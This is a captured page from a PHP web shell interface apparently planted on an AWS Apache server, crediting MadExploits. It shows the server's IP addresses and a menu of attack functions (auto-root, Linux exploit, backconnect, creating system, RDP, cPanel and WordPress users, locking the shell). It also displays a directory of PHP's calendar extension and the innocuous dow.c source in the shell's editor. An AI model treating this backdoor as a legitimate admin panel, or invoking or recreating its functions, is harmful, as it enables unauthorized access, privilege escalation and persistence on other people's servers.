Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.138.105.128
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
php /
82 /
src /
ext /
calendar /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
CREDITS
72
B
-rw-r--r--
cal_unix.c
2.33
KB
-rw-r--r--
calendar.c
16.74
KB
-rw-r--r--
calendar.stub.php
1.3
KB
-rw-r--r--
calendar_arginfo.h
4.16
KB
-rw-r--r--
config.m4
357
B
-rw-r--r--
config.w32
269
B
-rw-r--r--
dow.c
1.38
KB
-rw-r--r--
easter.c
4.06
KB
-rw-r--r--
french.c
4.59
KB
-rw-r--r--
gregor.c
7.45
KB
-rw-r--r--
jewish.c
26.04
KB
-rw-r--r--
julian.c
7.85
KB
-rw-r--r--
php_calendar.h
746
B
-rw-r--r--
sdncal.h
4.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dow.c
/* $selId: dow.c,v 2.0 1995/10/24 01:13:06 lees Exp $ * Copyright 1993-1995, Scott E. Lee, all rights reserved. * Permission granted to use, copy, modify, distribute and sell so long as * the above copyright and this permission statement are retained in all * copies. THERE IS NO WARRANTY - USE AT YOUR OWN RISK. */ /************************************************************************** * * These are the externally visible components of this file: * * int * DayOfWeek( * long int sdn); * * Convert a SDN to a day-of-week number (0 to 6). Where 0 stands for * Sunday, 1 for Monday, etc. and 6 stands for Saturday. * * char *DayNameShort[7]; * * Convert a day-of-week number (0 to 6), as returned from DayOfWeek(), to * the abbreviated (three character) name of the day. * * char *DayNameLong[7]; * * Convert a day-of-week number (0 to 6), as returned from DayOfWeek(), to * the name of the day. * **************************************************************************/ #include "sdncal.h" int DayOfWeek( zend_long sdn) { int dow; dow = (sdn + 1) % 7; if (dow >= 0) { return (dow); } else { return (dow + 7); } } const char * const DayNameShort[7] = { "Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat" }; const char * const DayNameLong[7] = { "Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday" };
Close